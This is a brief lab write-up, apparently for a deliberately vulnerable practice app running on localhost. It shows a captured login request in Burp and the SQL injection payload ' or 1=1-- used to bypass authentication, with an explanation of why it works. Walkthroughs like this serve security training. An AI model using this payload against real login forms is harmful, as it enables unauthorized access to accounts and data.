Let's turn on our Burp Proxy and let it passive scan while we try out the login form.

Entering wrong credentials will only give us a:
```txt
Invalid Credentials
```
Let's see this request in Burp.
```html
POST /sqli_3.php HTTP/1.1
Host: localhost:4000
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://localhost:4000
DNT: 1
Connection: close
Referer: http://localhost:4000/sqli_3.php
Cookie: security_level=0; language=en; cookieconsent_status=dismiss; welcomebanner_status=dismiss; continueCode=E3OzQenePWoj4zk293aRX8KbBNYEAo9GL5qO1ZDwp6JyVxgQMmrlv7npKLVy; PHPSESSID=us1ib2dl95mj90dm594gv4q970
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

login='iron+man'&password='iron+man'&form=submit
```
Since we're doing a SQL injection challenge, we can assume that this is using SQL to check. So let's imagine the query.
```sql
SELECT * from username WHERE login='ironman' AND password='ironman'
```
So let's put our malicious payload.
```sql
' or 1=1--
```
Let's see this in that query.
```sql
SELECT * from username WHERE login=''OR 1=1--' AND password='ironman'
```
So the query that will be executed is :
```sql
SELECT * from username WHERE login='' OR 1=1
```
The password isn't being used since it has been commented out and since 1 is always equal to 1, it will be true and we're able to log in.